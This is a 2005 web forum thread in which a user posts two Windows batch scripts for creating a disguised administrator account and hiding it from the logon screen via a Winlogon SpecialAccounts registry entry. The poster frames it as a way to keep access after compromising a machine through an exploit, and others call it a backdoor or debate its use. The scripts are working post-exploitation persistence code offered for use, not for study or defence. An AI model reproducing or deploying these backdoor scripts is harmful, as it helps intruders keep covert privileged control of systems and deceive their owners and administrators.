Welcome Guest ( Log In | Register)



 
Reply to this topicStart new topic
> Creating Hidden User
RemoteConnection
post Aug 3 2005, 03:07 AM
Post #1


Advanced Member
*******

Group: Members
Posts: 119
Joined: 3-August 05
Member No.: 10,207



when u have an access to a windows system by CMD , maybe u need to create an admin account with a remote cnnection,here's the way:
CODE

@echo off
net user IUSR_WAN /add /expires:never
net localgroup administrators /add IUSR_REMOTE
net user IUSR_WAN herman
net user IUSR_WAN /comment:"Built-in account for Remote Service"
net user IUSR_WAN /fullname:"Remote Service Account"


also another way that the user won't show on login screen!
CODE

@echo off
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
Exit
Go to the top of the page
 
+Quote Post
BuffaloHELP
post Aug 3 2005, 03:15 AM
Post #2


Desperately seeking "any key" to continue...
Group Icon

Group: Admin
Posts: 3,468
Joined: 23-April 05
From: Trap17 storage box
Member No.: 6,042



Looks like you need to create this in a batch file. Is that right? If so, you MUST explain the full process of saving to what file type. If this is the commands you need to type on the prompt, use the CONSOLE code. Don't forget to refer to the BB Code Help link during your post. Thank you.
Go to the top of the page
 
+Quote Post
RemoteConnection
post Aug 3 2005, 03:18 AM
Post #3


Advanced Member
*******

Group: Members
Posts: 119
Joined: 3-August 05
Member No.: 10,207



yea , that's right , a batch file , u know i just tried to explain it for a medium level user, but if it's needed to explain more , Sure
Go to the top of the page
 
+Quote Post
Saint_Michael
post Aug 3 2005, 03:21 AM
Post #4


$p4m 0n j00 $h4m3 m3 0nc3 $p4m 0n m3 $h4m3 m3 7\/\/1c3
*********************

Group: [HOSTED]
Posts: 6,466
Joined: 21-September 04
From: 9r33|\| 399$ 4|\|D 5P4/\/\
Member No.: 1,218
T17 GFX Crew



hmmm that shounds like a admin backdoor to a computer networking system hmm intriguing. but yeah its look lieky our missing something from it though.
Go to the top of the page
 
+Quote Post
BuffaloHELP
post Aug 3 2005, 03:23 AM
Post #5


Desperately seeking "any key" to continue...
Group Icon

Group: Admin
Posts: 3,468
Joined: 23-April 05
From: Trap17 storage box
Member No.: 6,042



It's TRAP17's posting rules to give full examples. It's also common courtesy to respect all levels of understandings in this forum. Let's not presume that everyone has the same technical background as you are.
Go to the top of the page
 
+Quote Post
RemoteConnection
post Aug 3 2005, 03:24 AM
Post #6


Advanced Member
*******

Group: Members
Posts: 119
Joined: 3-August 05
Member No.: 10,207



well, u know Saint_Michael if you have access to a system just by cmd,like when u gained access to a system by today's exploits .... u only have command proment ////
Go to the top of the page
 
+Quote Post
mayank
post Aug 3 2005, 04:12 AM
Post #7


Mankie
*********

Group: Members
Posts: 761
Joined: 22-July 05
From: New Delhi, India
Member No.: 9,746



i think there is no use of this trick....because then you'll need the admin rights to create any account like this...and secondly if you have admin rights then you you dont need this trick smile.gif
Go to the top of the page
 
+Quote Post
RemoteConnection
post Aug 3 2005, 04:16 AM
Post #8


Advanced Member
*******

Group: Members
Posts: 119
Joined: 3-August 05
Member No.: 10,207



well mayank , i'll give u an example , u have gained access to a system by exploit and it gave u the admin rights ... but u wanna create another admin account that u don't want to show on logon screen becase of the primary administrator /// ait?
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic

Collapse

> Similar Topics

Topics Topics
  1. Broadband Internet Connection Restriction(5)
  2. Popular Applications Are Creating Holes In Your Os(21)
  3. Could You Be Infected With Hidden Trojan?(9)


 



-